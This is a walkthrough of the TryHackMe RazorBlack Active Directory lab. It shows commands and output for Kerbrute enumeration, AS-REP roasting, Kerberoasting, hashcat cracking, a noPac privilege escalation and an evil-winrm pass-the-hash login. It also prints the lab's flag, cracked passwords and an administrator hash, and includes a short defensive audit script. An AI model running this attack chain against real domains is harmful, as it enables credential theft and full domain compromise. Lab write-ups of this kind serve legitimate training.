RazorBlack is a TryHackMe Active Directory challenge.

Enumeration:

nmap -sV -oN razorblack_ports 10.10.6.150

Initial nmap scan.

Scanning all ports with the -p- option.

It appears that NFS is available, so we’ll explore it.

NFS:

Mounting the /users directory.

sbradley flag: THM{ab53e0}

Active Directory:

Contents of the xlsx document:

Using the discovered names, we’ll create potential usernames so that we can test some Active Directory attacks.

dport
iroyce
tvidal
aedwards
cingram
ncassidy
rzaydan
lvetrova
rdelgado
twilliams
sbradely
clin
daven
imogen
tamara
arthur
carl
nolan
reza
ljudmila
rico
tyson
steven
chamber

Using Kerbrute, we were able to validate usernames and get an AS-REP hash for one of them.

Note that the hash kerbrute dumped could not be cracked as-is: it is tagged $krb5asrep$18$ (AES etype), while hashcat mode 18200 used below expects the etype 23 (RC4) format, so we had to use impacket-GetNPUsers instead to obtain the hash.

./kerbrute_linux_amd64 userenum --dc 10.10.166.100 -d raz0rblack.thm usernames.txt

2022/03/14 13:34:19 > [+] VALID USERNAME: lvetrova@raz0rblack.thm
2022/03/14 13:34:19 > [+] twilliams has no pre auth required. Dumping hash to crack offline: $krb5asrep$18$twilliams@RAZ0RBLACK.THM:07fbfbff68eb4b386f0c5eceacc965df$…
2022/03/14 13:34:19 > [+] VALID USERNAME: twilliams@raz0rblack.thm

Valid usernames:
lvetrova
twilliams

impacket-GetNPUsers raz0rblack.thm/ -no-pass -usersfile usernames.txt

Cracking the hash with hashcat:

hashcat -m 18200 asprephash.txt rockyou.txt

twilliams:roastpotatoes

Requesting SPN (Kerberoast) hashes with the twilliams credentials.

impacket-GetUserSPNs raz0rblack.thm/twilliams:roastpotatoes -dc-ip 10.10.166.100 -request

Cracking the hash for the xyan1d3 account.

hashcat -m 13100 xyanhash /usr/share/wordlists/rockyou.txt

xyan1d3:cyanide9amine5628
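Both footholds above come from directory misconfigurations that an administrator can audit directly: an account with Kerberos pre-authentication disabled (AS-REP roastable) and a user account carrying a servicePrincipalName (Kerberoastable). The following check is an added example, not part of the original write-up; the userAccountControl bit values are the documented AD ones, while the user records are constructed for illustration.

```python
# Added example (not from the write-up): audit AD user records for the two
# exposures exploited above. Attribute names follow the AD schema; the
# records in SAMPLE_USERS are constructed and do not describe the lab.
ACCOUNTDISABLE = 0x2            # userAccountControl: account disabled
DONT_EXPIRE_PASSWD = 0x10000    # userAccountControl: password never expires
DONT_REQ_PREAUTH = 0x400000     # userAccountControl: no Kerberos pre-auth


def audit_users(users):
    """Return {sAMAccountName: [findings]} for enabled accounts that are
    AS-REP roastable, Kerberoastable, or both with a non-expiring password."""
    findings = {}
    for user in users:
        name = user["sAMAccountName"]
        uac = user.get("userAccountControl", 0)
        if uac & ACCOUNTDISABLE:
            continue  # disabled accounts cannot be roasted
        issues = []
        if uac & DONT_REQ_PREAUTH:
            issues.append("DONT_REQ_PREAUTH set: AS-REP roastable")
        # Machine accounts (trailing $) legitimately hold SPNs; flag users only.
        if user.get("servicePrincipalName") and not name.endswith("$"):
            issues.append("SPN on user account: Kerberoastable")
            if uac & DONT_EXPIRE_PASSWD:
                issues.append("SPN account with non-expiring password")
        if issues:
            findings[name] = issues
    return findings


SAMPLE_USERS = [  # constructed sample records
    {"sAMAccountName": "twilliams", "userAccountControl": 0x400200},
    {"sAMAccountName": "xyan1d3", "userAccountControl": 0x10200,
     "servicePrincipalName": ["HTTP/haven-dc.raz0rblack.thm"]},
    {"sAMAccountName": "lvetrova", "userAccountControl": 0x200},
    {"sAMAccountName": "olduser", "userAccountControl": 0x400202},
    {"sAMAccountName": "HAVEN-DC$", "userAccountControl": 0x2000,
     "servicePrincipalName": ["HOST/haven-dc"]},
]

if __name__ == "__main__":
    for account, issues in audit_users(SAMPLE_USERS).items():
        print(f"{account}: {'; '.join(issues)}")
```

In a real environment the records would come from an LDAP query filtered on these same attributes; the disabled and machine accounts in the sample show the two cases the check deliberately ignores.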

Using noPac to dump hashes.
https://github.com/Ridter/noPac

python3 ~/Scripts/noPac/noPac.py raz0rblack.thm/xyan1d3:'cyanide9amine5628' -dc-ip 10.10.166.100 -dc-host haven-dc -dump --impersonate administrator -use-ldap

Using evil-winrm with the Administrator's hash to gain access to the system.

evil-winrm -i 10.10.166.100 -u administrator -H '9689931bed40ca5a2ce1218210177f0c'